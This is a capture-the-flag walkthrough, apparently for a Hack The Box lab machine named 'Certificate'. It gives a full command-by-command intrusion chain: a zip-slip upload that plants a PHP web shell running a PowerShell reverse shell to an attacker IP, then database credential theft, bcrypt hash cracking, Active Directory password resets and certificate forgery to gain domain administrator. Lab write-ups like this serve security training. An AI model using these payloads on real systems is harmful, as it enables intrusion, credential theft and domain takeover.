Recon
Nmap scan :
echo '10.10.11.71 DC01.certificate.htb certificate.htb' > /etc/hosts User flag
Go to webpage :
Create a student account and enroll course. Then click on random submit button :
You’ll have a upload page. She’s vulnerable to zip2slip. Execute the following commands :
touch evil.pdf
mkdir malicious_file && cd malicious_file
nano shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
cd ..
zip evil evil.zip
zip -r malicious_file malicious_file/
cat evil.zip malicious_file.zip > combined.zipNext, upload the file and click on ‘HERE’ and change the end of URL by ‘malicious_file/shell.php’ :
Look at certificate.htb/db.php :
PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
?>Use the command below to dump the users tables :
PS C:\xampp\htdocs\certificate.htb> C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D Certificate_WEBAPP_DB -e "SELECT * FROM users;"
id first_name last_name username email password created_at role is_active
1 Lorra Armessa Lorra.AAA lorra.aaa@certificate.htb $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG 2024-12-23 12:43:10 teacher 1
6 Sara Laracrof Sara1200 sara1200@gmail.com $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK 2024-12-23 12:47:11 teacher 1
7 John Wood Johney johny009@mail.com $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq 2024-12-23 13:18:18 student 1
8 Havok Watterson havokww havokww@hotmail.com $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti 2024-12-24 09:08:04 teacher 1
9 Steven Roman stev steven@yahoo.com $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2 2024-12-24 12:05:05 student 1
10 Sara Brawn sara.b sara.b@certificate.htb $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6 2024-12-25 21:31:26 admin 1
12 cyber fish cyber_fish cyber_fish@mail.com $2y$04$/ig4nzh4o60sFvgEvabAweyrQ2uljQomR5D6NrO4ZuScU0587Y3Me 2025-06-02 13:32:58 student 1
13 kash333 kash kash kash@kash.test $2y$04$/fALjZzHJfD2pEYA30d7jOc1UOnSu/B3bm69Pw.trGVTSvSg62JlW 2025-06-02 13:33:26 student 1
14 dwed dw test123 teste@test.com $2y$04$6cBQWbNr4oTPY69eUcfe/uRd6a6SHTJlqRJnU6Bro17jGxw5bn7Ey 2025-06-02 13:33:34 student 1
15 john doe johnd johnd@mail.com $2y$04$Wt0eyWlIZGyBhJS55MxfKOa8QVD7Y7vebf/vbWfs6AQGWNh3ZEsGC 2025-06-02 13:34:10 teacher 0
16 Zak zz No1V4 No1V4@gg.com $2y$04$5ZOtt1d7oYdfpysjw1b3nuqZJdK9UYXz627zPy7TL8ejV3uAwZYsu 2025-06-02 13:34:42 student 1
17 frixzer Frixzerfrixzer frixzer frixzer@frixzer.com $2y$04$VJJE0GPsoIca/fbk0pLu1ehA6r78tvWIwSGjfECttZ6BD3vcQY1M6 2025-06-02 13:36:17 teacher 0
18 Minus 1iq minus1iq minus1iq@mail.com $2y$04$2KlvL0T7TUAcno2e1xBT4ezUyeE9.I75RaDMdylc2Sw96foO18BAK 2025-06-02 13:39:16 student 1
19 pattack P pat admin4@admin.se $2y$04$GvD.yAipwEVuawjLuaDXGuzB7fHZXvjmYC3bax5Dju3ZWWlnfiFq6 2025-06-02 13:42:21 student 1
21 frixzerfrixzer frixzerfrixzer frixzerfrixzer frixzerfrixzer@frixzerfrixzer.com $2y$04$jBXb1EWj4UzRtqO0ui8tqObAXgTzsxxO5XtSphaMtZLQX6KWvo/YK 2025-06-02 13:54:09 student 1
22 teste teste teste teste@local.pt $2y$04$amnknftnyQTpHDkYTu0VM.bU5knymGJ9lVT2VSCOAjvktWGhRD1kS 2025-06-02 13:56:50 teacher 0
23 tiago tiago tiago t@t.com $2y$04$fhQikoqIzoJ4Rp8txMbRW.tExFsx62zGOf74q.O/uwkggXGZX7KF6 2025-06-02 14:29:18 student 1
24 amer k amerk amerk@gmail.com $2y$04$w.SyouqyT0qtw4bhtHuU8untMEciseCdi0oO7xm0MjgIGbIo9a47C 2025-06-02 14:37:23 student 1
25 appa appa appa appa@appa.com $2y$04$2zFzcigZ9DsS27tawBTLkuQA.OVLre.Z8pBgwd.wEQ6OIRfjax2Ia 2025-06-02 14:54:03 student 1
26 123 123 123 test@mail.ru $2y$04$FXtMlv3B3tn4pUms7XPTh.nMoN1QX73KZaKwa796zUxIdwWrQv7m2 2025-06-02 15:05:22 student 1
27 1234 1234 1234 1234@mail.ru $2y$04$OIdCZLXa87F5KeI0SjpccuQTurRcbI3dcNllNzoiHGxNTPQvvgZB6 2025-06-02 15:06:36 teacher 0
28 German Cat niman nicta@blackcat.cat $2y$04$7xg4llP2Ww5Z1O8740M5c.yEzU8p.mQPLMPXYRVkyqhFy0ethXoGe 2025-06-02 15:53:58 student 1
29 Nika Blackcat nicat nika99@blackcat.car $2y$04$l7ASl89CfDkWvcl4gQ6OuuUQzbvQDZIytsgWZzlsFVB0pCXZC1ZOW 2025-06-02 16:03:51 teacher 0
Crack the Sara.B hash :
echo '$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6' > sara_hash
hashcat -m 3200 sara_hash rockyou.txt -O -S -w 3
$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8U...kZNdH6
Time.Started.....: Mon Jun 2 17:20:24 2025 (1 sec)
Time.Estimated...: Mon Jun 2 17:20:25 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/lists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10385 H/s (9.14ms) @ Accel:12 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12240/14344384 (0.09%)
Rejected.........: 0/12240 (0.00%)
Restore.Point....: 12096/14344384 (0.08%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-16
Candidate.Engine.: Device Generator
Candidates.#1....: iloveu3 -> ulster
Hardware.Mon.#1..: Temp: 65c Util: 89%
Synchronize the time with faketime :
faketime "$(date +'%Y-%m-%d') $(net time -S 10.10.11.71 | awk '{print $4}')" zshUse Sara.B account with bloodhound :
bloodhound-python -u 'Sara.B' -p 'Blink182' -d certificate.htb -c All --zip -ns 10.10.11.71
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certificate.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certificate.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: dc01.certificate.htb
INFO: Found 19 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WS-05.certificate.htb
INFO: Querying computer: WS-01.certificate.htb
INFO: Querying computer: DC01.certificate.htb
INFO: Done in 00M 05S
INFO: Compressing output into 20250602172416_bloodhound.zipSelect Sara.B on searchbar :
Click on Transitive Object Controllers :
Sara.B is member of ACCOUNT_OPERATOR. Let’s go to see High Value Target :
This group as GenericAll on Lion.sk so you can change his password. To do this execute the following commands and then login to Lion.SK to obtain user flag :
net rpc password "Lion.SK" "newP@ssword2025" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
evil-winrm -i 10.10.11.71 -u 'Ryan.K' -p 'newP@ssword2025'
cd ../Desktop; type root.txt
Root flag
Change Password of Ryan.K like Lion.SK :
net rpc password "Ryan.K" "newP@ssword2025" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
evil-winrm -i 10.10.11.71 -u 'Ryan.K' -p 'newP@ssword2025'
whoami /priv
As you can see, SeManageVolumePrivilege is enabled. You can abuse it with this : https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe. With this exploit Ryan.K gain full access of C:\
Upload it to the target and execute it :
Now, use Certutil to export pfx file :
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx
cd C:\Users\Public
download ca.pfx
With this ca.pfx file we can forge our administrator.pfx. Back to your machine and run this command :
certipy forge -ca-pfx ca.pfx -upn administrator@certificate.htb -subject "CN=Administrator,CN=Users,DC=certificate,DC=htb" -out administrator_forged.pfxAnd then use certipy again to obtain the administrator hash :
certipy auth -pfx administrator_forged.pfx -dc-ip 10.10.11.71
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@certificate.htb'
[*] Using principal: 'administrator@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6
evil-winrm -i 10.10.11.71 -u 'administrator' -H 'd804304519bf0143c14cbf1c024408c6'
type ../Desktop/root.txt
Cyberfishement 🐡